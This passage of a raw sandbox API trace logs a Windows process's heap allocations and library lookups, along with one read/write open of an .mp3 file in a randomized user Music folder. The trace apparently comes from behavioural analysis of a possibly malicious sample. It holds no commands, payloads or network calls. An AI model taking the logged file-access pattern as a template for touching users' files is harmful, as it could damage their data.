lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.015] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\pkop0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.015] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=93, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xba) returned 0x9c3478 [0186.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=93, lpWideCharStr=0x9c3478, cchWideChar=93 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3") returned 93 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0186.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0186.017] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0186.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0186.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0186.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0186.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0186.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0186.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0186.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0186.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0186.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0186.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0186.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.019] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.021] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0186.021] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.022] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.023] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0186.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba0d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0186.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.024] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0186.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.024] CloseHandle (hObject=0x138) returned 1 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0186.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.025] FreeLibrary (hLibModule=0x75990000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.025] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0186.025] RtlAllocateHeap (HeapHandle=0x8a0000, 